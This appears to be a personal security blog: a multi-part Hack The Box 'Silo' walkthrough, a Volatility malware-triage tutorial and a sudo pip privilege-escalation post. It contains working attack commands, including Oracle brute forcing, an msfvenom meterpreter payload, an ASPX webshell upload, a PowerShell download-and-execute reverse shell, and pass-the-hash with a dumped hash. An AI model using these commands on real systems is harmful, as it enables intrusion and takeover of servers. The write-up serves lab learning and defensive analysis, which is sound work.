Pentest 5 : [htb] Silo, Privilege Escalation

Hi Everyone,

I am going to continue to the next phase of Silo box tutorial. At this tutorial we are going to do privilege escalation

Interesting things in this tutorial is we will not exploit the windows vulnerability to gain privilege but we will examine the memory dump.

Let start check it ..

We explore the windows directory and go to each of user home directory, I finally found that user Phineas has something interesting is an URL that has the memory dump of this server due to oracle issue

lets download, Oopss it requires password. Lets check the password it gives to us. Arrggh password incorrect.

I found that this was caused by the encoding problem in powershell. So what we need to do is to transfer it to our linux using the base64 encoding

Let do it

  1. PS C:\users\Phineas\Desktop> $myFile = Get-Content “Oracle Issue.txt”
  2. PS C:\users\Phineas\Desktop> $fe = [System.Text.Encoding]::UTF8.GetBytes($myFile)
  3. PS C:\users\Phineas\Desktop> [System.Convert]::ToBase64String($fe)

U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk

By then you can decode it in the linux using this command

echo “U3VwcG9ydCB2ZW5kb3I …” | | base64 -d

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password
under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$

we can see that the password is now properly decoded. We can now go forward by downloading the memory dump

Next things to do is to examine the memory dump that we have downloaded. We can now start to use volatility to examine the memory dump. First step is to check its profile

volatility -f SILO-20180105-221806.dmp imageinfo

imageinfo tells that there are several candidate for the profile

Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_14393, Win2012R2x64_18340, Win2012R2x64, Win10x64_10586, Win10x64, W
in2016x64_14393, Win10x64_16299, Win10x64_10240_17770, Win2012x64, Win8SP1x64_18340, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063)

We can see that the profile is Win2012R2x64, we select this profile because we know that the target OS is a server. After we get the profile information then we can now start digging some more information the remain in the memory during dump. We can see that the memory dump created due to crash dump which is blue screen. I assume there will be user that is logged in during the crash. We can search if there is a hash of the user left. You can use this command to check it

volatility -f SILO-20180105-221806.dmp –profile Win2012R2x64 hashdump

Wow.. we can get some hashes. All right the next step is we can check if we can use pass the hash attack technique to execute cmd to the server. we can use this command. You can find the pass the hash attack on the below url

https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd

Yeah we are now able to get the command prompt at the server at the level of administrator.

All right. That’s it the other technique to get the user elevation.

Pentest 4 : [htb] Silo, Reverse Shell

Hi there,

I am going to write about the reverse shell as the next step after we can upload the RCE web page to the server.

The question is why should we get reverse shell when we can actually do remote command execution at the server. The answer is just to get more flexibility to do the next step such as privilege escalation or finding information in the server.

Lets start doing this process. As I mentioned in the previous post that I going to use nishang powershell framework to do the reverse shell. I choose nishang powershell because of its simplicity.

Nishang is an open source framework and collection of powerful PowerShell scripts and payloads that you can use during penetration testing audit,  post exploitation phase or other stages of offensive security auditing. Nishang is useful during various phases of a security auditing process and has many scripts categorized into logical categories such as information gathering, scanning, privilege elevation etc. [https://n0where.net/powershell-penetration-testing-framework-nishang]

You can find the detail description of this framework at https://n0where.net/powershell-penetration-testing-framework-nishang

There are two ways of getting nishang, If you use kali linux then it is available at /usr/share/nishang or you can download from github https://github.com/samratashok/nishang

drwxr-xr-x 2 root root 4096 Sep 20 12:34 ActiveDirectory
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Antak-WebShell
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Backdoors
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Bypass
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Client
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Escalation
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Execution
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Gather
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Misc
drwxr-xr-x 2 root root 4096 Sep 20 12:34 MITM
-rw-r–r– 1 root root 929 Nov 12 2017 nishang.psm1
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Pivot
drwxr-xr-x 2 root root 4096 Sep 20 12:34 powerpreter
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Prasadhak
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Scan
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Shells
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Utility

There are a lot of powershell script that you can use as mentioned above. I am going to use Invoke-PowerShellTcp.ps1 that available in the directory Shells.

root@dragon:/usr/share/nishang/Shells# cat Invoke-PowerShellTcp.ps1
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

There are many types of reverse shell can be made, I pick Invoke-PowerShellTcp to create TCP reverse shell. You can also use Bind but the limitation of this that we should initiate the connection to the server in order to get the shell and for sure it is easier to be detected by Blue team because there are connection that destined to the server using port that is not common.

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Change the IPAddress to your computer ip address and port to the number you like. In order to use the script, you can copy the line above to the very below line of the file just like this https://github.com/rioasmara/wordpress/blob/master/rev.ps1

Now, the next step is to deliver this powershell to the server by using the remote command execution that we have in the server.

There are 3 things that you should prepare for this action are

  1. Prepare the local web server to enable remote server to download the rev.ps1, you can use python script to create HTTP Server using the command python -m SimpleHTTPServer 80
  2. You should create an NC server to receive the reverse shell connection initiated by our rev.ps1 powershell. You can use this command nc -nlvp 9001 .The port 9001 shall match the one that you specified in the nishang Invoke-PowerShellTcp.ps1
  3. Invoke powershell download file and execution using the remote command execution from the web
    powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.73/rev.ps1′)”

Here are the 3 steps above

Boom, We are now connected with the reverse shell. We execute the 3rd point command in the web in order to download our rev.ps1 file to the server and directly invoke the TCP reverse shell that connect to our NC server. You can now directly interact with the server shell like the image below

I will post on how to do the privilege escalation process. Meanwhile you can use the shell to explore the server and do enumeration.

Pentest 3 : [htb] Silo, Oracle for Remote Command Execution

Hi Everyone,

Today I am going to continue the last oracle exploitation for Silo box from hack the box. I am going to write another exploitation technique that involve some manual exploitations such as creating oracle query to write file and accessing the file from the available web server

The plan for this exploitation is to use the SQL read/write file function to upload our RCE capability using aspx file that can be invoke through the web server that is available in the server.

First we should have been able to connect to the oracle server since we have successfully brute force the username and password. We can try to connect using sqlplus that can be downloaded and installed from oracle website. You can connect to the oracle server using below command

sqlplus64 scott/tiger@10.10.10.82:1521/XE

After you are connected you can check the privilege given to the user, You should have file operation in order to do the exploitation. You can query the user privilege using below command

SQL> select * from session_privs;

Ooopss we can not see that our session have the write and read file privilege and how come we do the exploitation? Relax it is because our connection not running as DBA, so lets try add parameter as sysdba like the command below.

sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

Now we have much more privileges, we can try to read some file in the destination server. Lets check accessing the wwwroot file default html

declare
f utl_file.file_type;
s varchar(400);
begin
f := utl_file.fopen(‘/inetpub/wwwroot’, ‘iisstart.htm’,’R’);
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;

yeah the magic is there that we can read the iisstart.htm in the wwwroot directory. So the plan is to write a file that has remote command execution that can be executed from web browser.

First we need to prepare the web page that has remote command execution based on asp. If you are using kali linux then it is easy to find the sample in your installation just type locate webshell

/usr/share/webshells/asp/cmdasp.aspx

Kali linux has alot of exploit to provide webshell for various technology such as asp, aspx, php and java. You can pick one of them that suite your need. I pick cmdasp.aspx because our destination is IIS environment.

Since we are going to deliver our exploit using SQL command then It should be optimized because SQL command has length limit. You can calculate how many character in the file using cat and wc. here is the command

cat cmdasp.aspx | wc -c
1028

I think 1028 is quite OK. Do not optimize too much that cause your exploit is not going to work during invocation.

here is below the cmdasp.aspx that has been modified. https://github.com/rioasmara/wordpress/blob/master/cmdasp.aspx

The next step is to prepare the SQL command in order to send the exploit. Because cmdasp.aspx is a web page that has new line \n then we need to make all the code become in one line to enable to be put in SQL command

Here is how to convert the file to one line string

sed -z ‘s/\n//g’ cmdasp.aspx

You can download this one line code from my github https://github.com/rioasmara/wordpress/blob/master/cmdasp-online.txt

now create SQL query to deliver the exploit using below command

the next step is copy this exploit to the SQL query and execute it. https://github.com/rioasmara/wordpress/blob/master/exploit.write

with the above command we actually create an hello.aspx file with the content of exploit that we created. Now you can invoke the file by calling it from the browser because we write hello.aspx in the wwwroot directory in the server. By this file available at server, now we can do remote command execution as you can see in the picture below.

As the remote command execution is available, we can now leverage our access to get higher flexibility on doing our work by taking over the shell of the server. One of the way to get the shell is we can use powershell to allow us to create reverse shell connection. I do suggest you to use exploitation framework that is available such as nishang to help you minimize manual work in the powershell. You can download nishang framework from github https://github.com/samratashok/nishang

I will explain the reverse shell in the next post.

Pentest 2 : [htb] Silo, Exploitation Oracle

Hi All,

I would like to continue the last article about hacking Silo from hack the box PenTest box.

The last steps that we have done is the recon and enumeration phase of the penetration testing. So that we can continue with exploitation in order to gain access to the server.

We have the user and password from the last enumeration so that we can continue to exploit the server in order to gain access.

ODAT has the capability of delivering the malware to the system by accessing the capability of oracle to write a file to the system. Lets first make the exploit using msfvenom with the command below

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.73 lport=4545 -f exe > rio.exe

Lets start delivering the malware to the server using ODAT using utlfile functionality as below

So the command will look as below

/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE –sysdba –putFile
c:/ rio.exe rio.exe

Okay we have successfully deliver our exploit to the server using the oracle write file function. we put the malware on C:/rio.exe

Now we can invoke the malware using the capability of oracle to load external table to run executable. But before we can execute the exploit let make the reverse handle using metasploit multi handler

After we have created the reverse handler then we can now invoke the exploit at the remote server. We can use ODAT command as below

./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE –sysdba c:/ rio.exe

After the ODAT has successfully execute the remote exploit we can now check the reverse handler in the metasploit that there should be one session created like below image

We can now start interacting with the established session using command

session -i 1 (1 is the session id)

meterpreter provide a lot functionality that you can use on the post exploitation, you can just type help in the meterpreter session

for example we can check who we are in the target system by using below command

meterpreter > getuid

We can see from the above picture that we are at the highest privilege account at the server that you can also query the list of privileges that you have by using this command

meterpreter > getprivs

OK that is all about the lab. finally we can hack the server and get the highest privilege. I will show you another technique that is a bit manual work but also effective for some exploitation technique in the next post.

Pentest 1 : [htb] Silo, Hack Oracle

Hi everyone,

Today I am going to write a little walk-through of a box from hack the box lab. I am going to explain the step by step of the box called Silo.

Overall the walk-through will be divided into three phases which are hacking the oracle database web exploitation and priv escalation.

Let start, As usual we should do recon. The best tools for recon is nmap. You can use the command below to do nmap

nmap -sS -sV -sC -vvv 10.10.10.82
-sS = SYN scan
-sC = banner grabbing
-sV = check the version of target service
-vvv = be verbose

http open port 80
oracle server port 1521

we can see that there is open port for oracle database 11.2 and port 80 for http. We have two attack surface that can be used to exploit. I will use an application called ODAT (Oracle Database Attacking Tool)  to help me on analyzing the oracle database service. this tools can be download from https://github.com/quentinhardy/odat

first lets brute force for the SID that is available in the server. We use the command below

./odat.py sidguesser -s 10.10.10.82 -p 1521

We found 2 instances of database XE and XEXDB. Now the next step is to brute force the username and password. We can use odat to brute force with this command below

./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE

But do not forget to provide the username and password wordlist in the directory accounts within odat directory. The username and password shall be formatted username/password just like below

we finally found the username and password of XE instance. here below the picture

the username is scott and password is tiger.

OK that is all about recon and enumeration phase of the Penetration Test Cycle. I will continue to the exploitation phase in the next blog.

Basic : Extracting Malware from memory

Hi All,

I would like to share a bit regarding the basic information about extracting malware from the dump memory using a powerful application called volatility. I called it basic knowledge because I want to give you some ideas on how to analyze things in the memory. However, there are a lot of other application that can help you to investigate running application in the memory in real-time such as Falcon Crowdstrike that enable detailed memory forensic that is able to visualize event to network graph.

In this tutorial, the scenario is we have a malware at Windows XP that is running silently and infect the host and start to connect back to it CnC server. You can download the memory dump for this exercise from http://files.sempersecurus.org/dumps/cridex_memdump.zip

First of all, you must have installed volatility application. I am using kali linux for this but you can actually just install using the step below (I took the picture from internet)

install volatility

OK now volatility is ready. Now you start analyzing the memory dump file that you downloaded but do not forget to unzip it first

As you know that information in the memory is formatted in different way that depend on the operating system. So the first step is to find the suitable profile of memory dump that we want to analyze. we can use the command

volatility -f cridex.vmem imageinfo

plugin imageinfo

We can see from the information above that volatility suggest that it suit with profile WinXPSP2x86 or WinXPSP3x86. We can now further drill down our malware hunting.

The next step is to find out what application is running at the that time the dump was taken. we can use the command

volatility –profile WinXPSP2x86 -f cridex.vmem pstree

plugin pstree

another way to find out what applications are running by using this command

volatility –profile WinXPSP2x86 -f cridex.vmem pslist

plugin pslist

from the application list above we can see that there is an application that is suspicious with PID 1640 reader_sl.exe with the parent process is explorer.exe PID 1484 which mean that reader_sl.exe was triggered by explorer application.

it is also important that you check the application that tries to hide it self from the task list. You can use. if you see any process that is false in the pslist and psscan then you can assume this is the malware

volatility –profile WinXPSP2x86 -f cridex.vmem psxview

plugin psxview

the next step to check is the connection event, usually malware will create connection back to the its CnC (Command and Control) in order to do its next task or sending the information to it for any information that the malware successfully extract from the host. We can use the command below to scan the connection

volatility –profile WinXPSP2x86 -f cridex.vmem connscan

plugin connscan

We can see that the above PID 1484 established a connection to internet IP 41.168.5.140 port 8080 and IP 125.19.103.198 port 8080 that we are not sure what IP it is.

We can also further check the connection by using the socket plugin to analyze the connection status Listening for connection. You can use below command

volatility –profile WinXPSP2x86 -f cridex.vmem sockets

plugin socket

From the picture above we can also see that PID 1484 (explorer, the parent of reader_sl.exe) is actually waiting for TCP connection that accepting from any IP.

the next step is to analyze on how an application is triggered in the command line and what is the parameter and path of the application. We can use the command as below

volatility –profile WinXPSP2x86 -f cridex.vmem cmdline

plugin cmdline

we can see that reader_sl.exe that we suspect as the malware is actually installed in “C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe” and triggered without any parameter. we can compare the application that is triggered with parameter such as Command line : C:\WINDOWS\system32\svchost.exe -k LocalService

The next step that is to analyze the binary of Reader_sl.exe. We can extract that specific binary from the memory dump using this command

volatility –profile WinXPSP2x86 -f cridex.vmem procdump -p 1640 –dump-dir .

plugin procdump

with the above command, volatitility extract the binary from the memory and name this binary with executable.1640.exe. By this binary then you can start analyzing it. You can upload it to virustotal.com to check what kind of malware it is

We can now can conclude that the binary is malware so that the first question of malware triage about existency of malware can be answered. But do not stop here. Triage malware is not just stop here. You should know what this malware is trying to do or what is the objective and how the malware could install it self in the host or how the malware could come to your premises.

Next thing to do is to also dump the memory area that the malware use so that we can narrow down our search for this particular malware only. We can use this below command to extract

volatility –profile WinXPSP2x86 -f cridex.vmem memdump -p 1640 –dump-dir .

plugin memdump

OK now we have the memory dump of the malware. We know that this malware is trying to connect to a server so that we need to find what kind of protocol it uses to connect to internet (CnC at 41.168.5.140 ). We can use find string toward the memory dump

strings 1640.dmp | grep -Fi “41.168.5.140” -C 5

strings

so that we can conclude that the communication with the CnC is using http protol. So by this we know that our perimeter protection is not able to detect the signature. We can see it is posting some data to the url http://41.168.5.140/zb/v_01_a/in/

Lets try to find the zb/v_01_a/in/ and see what will happen.

strings 1640.dmp | grep -Fi “zb/v_01_a/in/” -C 5

strings

Ohhh we found another CnC IP 188.40.0.138 at port 8080

Lets go further to drill the memory, perhaps we can find some more information

strings 1640.dmp | less

we can see that this malware has a collection of domain that it tries to infect.

So we can conclude for our malware triage points as below

  1. Is the malware exist in our perimeter ? Yes, the malware exist within our perimeter
  2. How this malware come into the perimeter ? It is exploiting the pdf reader installation so high possibility of non updated PDF Reader get exploited via Phishing campaign
  3. What is the objective of this malware ? it is leaking data

OK that is all for today. I will make detail malware analyses of this malware using static and dynamic analyses using IDA tools.

Little mistake that kills

Hi All,

Today I am writting about a small mistake that system admin might do in configuring their linux system.

As usuall, After the admin configure the system they will give certain priviledge to the user to run certain command that enable to run as admin that we call it sudo. But sometimes the admin is not really careful that in order to enable let the user not bugging them too much then they just enable anything that user need without any security risk analyses.

There are alot of sudo execution that actually cannot be just given to the user because by using that command they can escalate to certain level that endanger the system

Below is one of the command that is danger to be given to the user using sudo

(root) /usr/bin/pip install *

the above command is installation manager for python package, this usually give by the admin to enable the developer user to install they addition python packages. So what is the deal ? with that command give, the user could use sudo pip <malicious_command> to do the priviledge escalation by installing malicious script

Lest do the exploitation. create a python script called exploit.py in a directory just like the below script

import pty
pty.spawn(“/bin/bash”) //create a spawn shell

and save it.

after that you can run in the directory with this command

sudo pip install .

the pip install will execute the exploit.py and run the command in the file which spawn a shell

Since the script is run in the priviledge of root then the shell that just spawned is in the root context

Soo .. now you have escallated to root.

Easy right..

This kind of mistake is just very radicolous … usually done by the lazy admin .. 🙂